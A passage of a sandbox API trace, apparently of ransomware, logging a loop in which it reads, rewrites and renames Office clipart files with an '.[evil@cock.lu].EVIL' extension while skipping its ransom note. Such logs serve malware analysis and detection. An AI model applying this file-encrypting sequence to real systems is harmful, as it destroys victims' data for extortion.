(_Str="J0341738.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.285] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341738.JPG") returned 69 [0156.285] wcscmp (_String1="J0341738.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.285] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341738.JPG") returned 0x0 [0156.285] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341738.JPG") returned 0x45 [0156.285] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341738.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341738.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.288] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4ec6, lpOverlapped=0x0) returned 1 [0156.311] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.311] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.311] _errno () returned 0x84b1160840 [0156.311] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.311] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4ee0, lpOverlapped=0x0) returned 1 [0156.311] CloseHandle (hObject=0x1a8) returned 1 [0156.311] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341738.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.311] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.312] __uncaught_exception () returned 0x84b1160800 [0156.312] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.312] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341738.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341738.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341738.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341738.jpg.[evil@cock.lu].evil")) returned 1 [0156.313] ??_V@YAXPEAX@Z () returned 0x1 [0156.317] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341738.JPG", dwFileAttributes=0x200) returned 0 [0156.317] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.317] wcsstr (_Str="J0341742.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.317] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341742.JPG") returned 69 [0156.317] wcscmp (_String1="J0341742.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.317] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0341742.JPG") returned 0x0 [0156.317] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341742.JPG") returned 0x45 [0156.317] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341742.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341742.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.320] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x49ba, lpOverlapped=0x0) returned 1 [0156.332] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.332] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.332] _errno () returned 0x84b1160840 [0156.332] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.332] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x49c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x49c0, lpOverlapped=0x0) returned 1 [0156.332] CloseHandle (hObject=0x1a8) returned 1 [0156.332] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341742.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.333] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.333] __uncaught_exception () returned 0x84b1160800 [0156.333] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.333] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341742.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341742.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341742.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341742.jpg.[evil@cock.lu].evil")) returned 1 [0156.334] ??_V@YAXPEAX@Z () returned 0x1 [0156.338] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341742.JPG", dwFileAttributes=0x200) returned 0 [0156.338] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.338] wcsstr (_Str="J0382836.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.338] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382836.JPG") returned 69 [0156.338] wcscmp (_String1="J0382836.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.338] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382836.JPG") returned 0x0 [0156.338] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382836.JPG") returned 0x45 [0156.338] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382836.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382836.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.340] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x10bdc, lpOverlapped=0x0) returned 1 [0156.350] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.350] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.350] _errno () returned 0x84b1160840 [0156.350] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.351] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x10be0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x10be0, lpOverlapped=0x0) returned 1 [0156.351] CloseHandle (hObject=0x1a8) returned 1 [0156.351] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382836.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.351] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.351] __uncaught_exception () returned 0x84b1160800 [0156.351] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.352] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382836.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382836.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382836.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382836.jpg.[evil@cock.lu].evil")) returned 1 [0156.353] ??_V@YAXPEAX@Z () returned 0x1 [0156.356] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382836.JPG", dwFileAttributes=0x200) returned 0 [0156.357] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.357] wcsstr (_Str="J0382925.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.357] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382925.JPG") returned 69 [0156.357] wcscmp (_String1="J0382925.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.357] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382925.JPG") returned 0x0 [0156.357] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382925.JPG") returned 0x45 [0156.357] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382925.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382925.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.360] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1ce5a, lpOverlapped=0x0) returned 1 [0156.369] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.369] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.369] _errno () returned 0x84b1160840 [0156.370] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.370] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1ce60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ce60, lpOverlapped=0x0) returned 1 [0156.370] CloseHandle (hObject=0x1a8) returned 1 [0156.370] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382925.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.370] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.371] __uncaught_exception () returned 0x84b1160800 [0156.371] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.371] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382925.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382925.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382925.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382925.jpg.[evil@cock.lu].evil")) returned 1 [0156.372] ??_V@YAXPEAX@Z () returned 0x1 [0156.463] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382925.JPG", dwFileAttributes=0x200) returned 0 [0156.464] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.464] wcsstr (_Str="J0382926.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.464] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382926.JPG") returned 69 [0156.464] wcscmp (_String1="J0382926.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.464] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382926.JPG") returned 0x0 [0156.464] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382926.JPG") returned 0x45 [0156.464] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382926.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382926.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.467] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1672c, lpOverlapped=0x0) returned 1 [0156.500] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.500] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.500] _errno () returned 0x84b1160840 [0156.500] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.500] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x16740, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x16740, lpOverlapped=0x0) returned 1 [0156.500] CloseHandle (hObject=0x1a8) returned 1 [0156.500] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382926.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.501] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.501] __uncaught_exception () returned 0x84b1160800 [0156.501] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.501] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382926.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382926.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382926.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382926.jpg.[evil@cock.lu].evil")) returned 1 [0156.502] ??_V@YAXPEAX@Z () returned 0x1 [0156.505] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382926.JPG", dwFileAttributes=0x200) returned 0 [0156.506] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.506] wcsstr (_Str="J0382927.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.506] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382927.JPG") returned 69 [0156.506] wcscmp (_String1="J0382927.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.506] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382927.JPG") returned 0x0 [0156.506] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382927.JPG") returned 0x45 [0156.506] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382927.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382927.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.508] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f86c, lpOverlapped=0x0) returned 1 [0156.525] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.525] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.525] _errno () returned 0x84b1160840 [0156.526] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.526] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1f880, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f880, lpOverlapped=0x0) returned 1 [0156.526] CloseHandle (hObject=0x1a8) returned 1 [0156.526] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382927.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.526] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.527] __uncaught_exception () returned 0x84b1160800 [0156.527] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.527] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382927.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382927.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382927.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382927.jpg.[evil@cock.lu].evil")) returned 1 [0156.528] ??_V@YAXPEAX@Z () returned 0x1 [0156.531] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382927.JPG", dwFileAttributes=0x200) returned 0 [0156.532] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.532] wcsstr (_Str="J0382930.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.532] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382930.JPG") returned 69 [0156.532] wcscmp (_String1="J0382930.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.532] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382930.JPG") returned 0x0 [0156.532] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382930.JPG") returned 0x45 [0156.532] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382930.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382930.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.534] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b83a, lpOverlapped=0x0) returned 1 [0156.543] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.544] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.544] _errno () returned 0x84b1160840 [0156.544] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.544] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x1b840, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b840, lpOverlapped=0x0) returned 1 [0156.544] CloseHandle (hObject=0x1a8) returned 1 [0156.544] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382930.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.545] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.545] __uncaught_exception () returned 0x84b1160800 [0156.545] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.545] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382930.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382930.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382930.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382930.jpg.[evil@cock.lu].evil")) returned 1 [0156.546] ??_V@YAXPEAX@Z () returned 0x1 [0156.549] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382930.JPG", dwFileAttributes=0x200) returned 0 [0156.550] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.550] wcsstr (_Str="J0382931.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.550] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382931.JPG") returned 69 [0156.550] wcscmp (_String1="J0382931.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.550] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382931.JPG") returned 0x0 [0156.550] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382931.JPG") returned 0x45 [0156.550] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382931.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382931.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.552] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1df43, lpOverlapped=0x0) returned 1 [0156.564] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.564] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0156.564] _errno () returned 0x84b1160840 [0156.564] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.564] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1df60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1df60, lpOverlapped=0x0) returned 1 [0156.564] CloseHandle (hObject=0x1a8) returned 1 [0156.567] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382931.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0156.567] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0156.567] __uncaught_exception () returned 0x84b1160800 [0156.567] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0156.567] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382931.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382931.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382931.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382931.jpg.[evil@cock.lu].evil")) returned 1 [0156.568] ??_V@YAXPEAX@Z () returned 0x1 [0156.572] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382931.JPG", dwFileAttributes=0x200) returned 0 [0156.572] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0156.572] wcsstr (_Str="J0382938.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0156.572] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382938.JPG") returned 69 [0156.572] wcscmp (_String1="J0382938.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0156.572] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0382938.JPG") returned 0x0 [0156.572] wcslen 